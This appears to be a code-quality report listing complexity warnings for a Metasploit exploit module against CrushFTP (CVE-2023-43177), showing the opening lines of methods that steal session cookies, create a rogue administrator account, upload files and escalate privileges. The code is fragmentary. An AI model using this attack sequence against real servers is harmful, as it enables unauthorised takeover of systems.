File crushftp_rce_cve_2023_43177.rb
has 585 lines of code (exceeds 250 allowed). Consider refactoring. Open
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
Method exploit
has a Cognitive Complexity of 35 (exceeds 5 allowed). Consider refactoring. Open
def exploit
admin_creds = nil
is_windows = nil
loop do
print_status('Downloading the session file')
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method do_priv_esc_and_check_windows
has 78 lines of code (exceeds 25 allowed). Consider refactoring. Open
def do_priv_esc_and_check_windows(session)
vprint_status('Looking for a directory with write permissions')
writable_dir = get_writable_dir('/', session[:cookie])
if writable_dir.nil?
print_bad('[do_priv_esc_and_check_windows] The user has no upload permissions, privilege escalation is not possible')
Method initialize
has 73 lines of code (exceeds 25 allowed). Consider refactoring. Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CrushFTP Unauthenticated RCE',
Method create_admin_account
has 63 lines of code (exceeds 25 allowed). Consider refactoring. Open
def create_admin_account(cookie, is_windows)
# This creates an administrator account with the required VFS setting for the exploit to work
admin_username = rand_text_hex(10)
admin_password = rand_text_hex(10)
user_xml = <<~XML.gsub!(/\n */, '')
Method exploit
has 50 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
admin_creds = nil
is_windows = nil
loop do
print_status('Downloading the session file')
Method get_session_file
has a Cognitive Complexity of 15 (exceeds 5 allowed). Consider refactoring. Open
def get_session_file
# Setting this here to be reachable by the ensure block
cookie = nil
begin
cookie = get_anon_session
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method do_priv_esc_and_check_windows
has a Cognitive Complexity of 15 (exceeds 5 allowed). Consider refactoring. Open
def do_priv_esc_and_check_windows(session)
vprint_status('Looking for a directory with write permissions')
writable_dir = get_writable_dir('/', session[:cookie])
if writable_dir.nil?
print_bad('[do_priv_esc_and_check_windows] The user has no upload permissions, privilege escalation is not possible')
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method send_query_api
has a Cognitive Complexity of 14 (exceeds 5 allowed). Consider refactoring. Open
def send_query_api(command:, cookie: nil, vars: {}, multipart: false, timeout: 20)
opts = {
'uri' => normalize_uri(target_uri.path, 'WebInterface/function/'),
'method' => 'POST'
}
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method get_session_file
has 40 lines of code (exceeds 25 allowed). Consider refactoring. Open
def get_session_file
# Setting this here to be reachable by the ensure block
cookie = nil
begin
cookie = get_anon_session
Method get_writable_dir
has a Cognitive Complexity of 12 (exceeds 5 allowed). Consider refactoring. Open
def get_writable_dir(path, cookie)
res = send_query_api(command: 'getXMLListing', cookie: cookie, vars: { 'path' => path, 'random' => "0.#{rand_text_numeric(17)}" })
xml_doc = res.get_xml_document
current_path = xml_doc.xpath('//listingInfo/path').text
if xml_doc.xpath('//listingInfo/privs').text.include?('(write)')
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method upload_file
has 32 lines of code (exceeds 25 allowed). Consider refactoring. Open
def upload_file(file_path, file_content, id, cookie)
file_size = file_content.size
vars = [
{ 'name' => 'upload_path', 'data' => file_path },
{ 'name' => 'upload_size', 'data' => file_size },
Method send_query_api
has 28 lines of code (exceeds 25 allowed). Consider refactoring. Open
def send_query_api(command:, cookie: nil, vars: {}, multipart: false, timeout: 20)
opts = {
'uri' => normalize_uri(target_uri.path, 'WebInterface/function/'),
'method' => 'POST'
}
Method check_sessions
has a Cognitive Complexity of 7 (exceeds 5 allowed). Consider refactoring. Open
def check_sessions(session_file)
valid_sessions = []
session_cookies = session_file.scan(/\d{13}_[A-Za-z0-9]{30}/).uniq
vprint_status("Found #{session_cookies.size} session cookies in the session file")
session_cookies.each do |cookie|
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method create_admin_account
has a Cognitive Complexity of 7 (exceeds 5 allowed). Consider refactoring. Open
def create_admin_account(cookie, is_windows)
# This creates an administrator account with the required VFS setting for the exploit to work
admin_username = rand_text_hex(10)
admin_password = rand_text_hex(10)
user_xml = <<~XML.gsub!(/\n */, '')
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method check
has a Cognitive Complexity of 6 (exceeds 5 allowed). Consider refactoring. Open
def check
vprint_status('Checking CrushFTP Server')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'WebInterface', 'login.html'),
'method' => 'GET'
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"